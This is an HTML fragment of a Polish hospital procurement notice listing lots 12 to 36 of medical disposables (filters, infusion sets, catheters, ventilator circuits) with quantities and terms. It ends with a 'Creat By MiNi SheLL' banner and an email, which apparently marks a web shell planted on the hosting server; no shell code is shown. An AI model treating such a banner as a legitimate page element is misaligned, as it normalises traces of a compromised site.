<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> WORKI DO GODZINOWEJ ZBIÓRKI MOCZU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Worek do godzinowej zbiórki moczu, min. 2000 ml - 180 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> STERYLNE FILTRY ELEKTROSTATYCZNE I MECHANICZNE DLA DOROSŁYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci	dla dorosłych - 9000 szt.;
2) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci ze złączem bocznym	dla dorosłych - 500 szt.;	
3) Sterylny filtr mechaniczny z wymiennikiem ciepła i wilgoci dla dorosłych - 1000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> STERYLNE FILTRY ELEKTROSTATYCZNE PEDIATRYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci	pediatryczny - 600 szt.;
2) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci z wejściem bocznym	pediatryczny - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> STERYLNE FILTRY ELEKTROSTATYCZNE NOWORODKOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci, noworodkowy - 700 szt.;
2) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci, dla niemowląt i dzieci - 700 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> WYMIENNIK CIEPŁA I WILGOCI DO RUREK TRACHEOSTOMIJNYCH I INTUBACYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiennik ciepła i wilgoci do rurek tracheostomijnych i intubacyjnych - 900 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PRZEPŁYWOWY NAWILŻACZ TLENU JEDNORAZOWEGO UŻYTKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przepływowy nawilżacz tlenu jednorazowego użytku - 700 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> APARATY DO POMPY BRAUN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Aparaty do pompy infuzyjnej do płynów - 1600 szt.;
2) Aparaty do przetaczania krwi i środków krwiopochodnych - 500 szt.;
3) Aparaty do podawania leków cytostatycznych z filtrem - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> REGULATOR PRĘDKOŚCI PRZEPŁYWU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do precyzyjnego sterowania szybkością przepływu w grawitacyjnych infuzjach dożylnych - 3000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> KOCYK DLA DOROSŁYCH DO APARATU EQUATOR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Kocyk dla dorosłych na górną połowę ciała do ogrzewacza konwekcyjnego, jednorazowego użytku - 70 szt.;
2) Kocyk dla dorosłych na całe ciało do ogrzewacza konwekcyjnego, jednorazowego użytku  - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> LINIE DO PODGRZEWACZA HOTLINE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Linie do przepływowego podgrzewacza płynów i krwi jednorazowego użytku - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> ZESTAWY DO KANIULACJI DUŻYCH NACZYŃ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestawy do kaniulacji dużych naczyń - dwukanałowe, rozm. 6F/15G 7F/14G - 500 szt.;
2) Zestawy do kaniulacji dużych naczyń - trzykanałowe, rozm. 7F/14G - 700 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> ZESTAWY DO KANIULACJI ŻYŁ CENTRALNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do kaniulacji żył centralnych, rozm. 7F/14G - 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> ZESTAWY DO PRZEZSKÓRNEGO DRENAŻU, RAMPY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestawy do drenażu przezskórnego - rozszerzony, rozm. 6F, 9F - 180 szt.;
2) Zestawy do drenażu przezskórnego - jednostopniowy, rozm. 9F - 120 szt.;
3) Przedłużacz do drenażu przezskórnego, rozm. 12F - 500 szt.;
4) Rampa trójdrożna - j. uż. sterylna - 500 szt.;
5) Rampa dwudrożna - j. uż. sterylna - 500 szt.;
6) Dren do klatki piersiowej, 50 cm - 150 szt.;
7) Kateter do szynowania jelit, 300 cm - 5 szt.				
8) Kranik trójdrożny z przedłużeniem luer-loc, przedłużacz 7 cm - 1600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> ZESTAWY DO ZNIECZULEŃ ZEWNĄTRZOPONOWYCH CIĄGŁYCH ORAZ ŁĄCZONYCH ZEWNĄTRZOPONOWO-PODPAJĘCZYCH (CSE).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestaw do znieczulenia zewnątrzoponowego - ciągłego - 380 szt.;
2) Dodatkowe wyposażenie zestawu -filtry zewnątrzoponowe płaskie - 30 szt.;
3) Zestawy łączonego znieczulenia zewnątrzoponowo-podpajęczego - 20 szt.;
4) Igła Touhy, rozm. 18G/8cm - 50 szt.;				
5) Strzykawka niskooporowa, 10ml - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> ZESTAWY DO POMIARU CIŚNIENIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestawy do pomiaru ciśnienia - 800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> OBWODY DO RESPIRATORA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Obwody do respiratora Neftis - 50 szt.;
2) Obwody do respiratora Trilogi - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> OBWODY DO APARATU DO ZNIECZULENIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obwód oddechowy jednorazowy do znieczulenia /2 rury min 180 cm - 600 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> OBWODY DO RESPIRATORA W ODDZIALE ANESTEZJOLOGII I INTENSYWNEJ TERAPII DOROSŁYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Układ obwodów do respiratora jednorazowego użytku - 1000 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> ELEKTRODY DO CZASOWEJ STYMULACJI SERCA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Elektroda do czasowej stymulacji serca, rozm. 6Fx125 cm, 7Fx125 cm - 60 szt.;
2) Introduktor do wprowadzania elektrod, rozm.	7Fx120 mm, 8Fx120 mm - 65 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> PRZYRZĄDY DO ŻYWIENIA DOJELITOWEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przyrządy do żywienia, pack - 1500 szt.;				
2) Przyrządy do żywienia, na butelkę - 1500 szt.;
3) Zgłębnik poliuretanowy, rozm. 10/130 cm - 50 szt.;
4) Zgłębnik poliuretanowy, rozm. 12/110-130 cm - 50 szt.;
5) Aparaty do pompy FLOCARE 800, na butelkę - 100 szt.	;
6) Aparaty do pompy FLOCARE 800, pack - 100 szt.;
7) Aparaty do pompy FLOCARE INFINITY, pack - 1000 szt.;
8) Zgłębnik gastrostomijny, rozm. 14, 18, 20/23cm - 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> KRANIKI TRÓJDROŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedłużacz luer-lock z kranikiem trójdrożnym	10cm - 1200 szt.;
2) Przedłużacz luer-lock z kranikiem trójdrożnym	20cm - 25cm - 200 szt.;
3) Kranik trójdrożny - jednorazowego użytku -sterylny - 8000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> PRZEDŁUŻACZE ANESTEZJOLOGICZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedłużacze anestezjologiczne - 5000 szt.;			
2) Łącznik obrotowy - 400 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> DRENY DO POMPY OBJĘTOŚCIOWEJ GRASEBY 3000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestaw do krwi bez portu do wstrzyknięć - standard, filtr 200? - 20 szt.;
2) Zestaw infuzyjny pediatryczny z portem - standard - 20 szt.;
3) Zestaw infuzyjny do przetoczeń chemioterapeutyków, filtr 0,2? - 100 szt.;
4) Zestaw infuzyjny do przetoczeń leków cytotoksycznych - 600 szt.;
5) Zestaw infuzyjny do przetoczeń z portem - standard - 20 szt.;
6) Filtr do płynów na 96 godzin dla noworodków	- 50 szt.;
7) Filtr do żywienia dojelitowego dla noworodków - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> PRZEDŁUZACZE DO POMP STRZYKAWKOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedłużacz do pomp luer-lock, dł. 0,90m - 100 szt.;
2) Przedłużacz do pomp luer-lock, dł. 1,20m - 100 szt.;
3) Przedłużacz do pomp luer-lock, dł. 1,50m - 25000 szt.;
4) Przedłużacz do pomp luer-lock bursztynowy, dł. 1,50m - 5000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> CEWNIKI DO ODSYSANIA, ZGŁĘBNIKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Cewnik do odsysania, rozm. Ch 4 - 600 szt.;
2) Cewnik do odsysania, rozm. Ch 6, Ch 8 - 18000 szt.;
3) Cewnik do odsysania, rozm. Ch 10, Ch 12 - 15000 szt.;
4) Cewnik do odsysania, dł. min. 800mm, rozm. Ch 14, Ch 16, Ch 18 - 68000 szt.;
5) Cewnik do karmienia niemowląt z zatyczką, rozm. Ch 6, Ch 8 - 24000 szt.;
6) Cewnik do podawania tlenu przez nos /wąsy/	pediatryczny i dla dorosłych - 6000 szt.;
7) Zgłębnik żołądkowy sterylny, rozm. 	Ch 8/800mm - 20 szt.;
8) Zgłębnik żołądkowy sterylny, rozm.	Ch 10/800mm - 100 szt.;
9) Zgłębnik żołądkowy sterylny, rozm. 	Ch 12/800mm - 100 szt.;
10) Zgłębnik żołądkowy sterylny, rozm. Ch 14/800mm - 800 szt.;
11) Zgłębnik żołądkowy sterylny, rozm. Ch 16/800mm - 1300 szt.;
12) Zgłębnik żołądkowy sterylny, rozm. Ch 18/1000mm - 900 szt.;
13) Zgłębnik żołądkowy sterylny, rozm. Ch 20/1000mm - 300 szt.;
14) Zgłębnik żołądkowy sterylny, rozm. Ch 28/1000mm - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com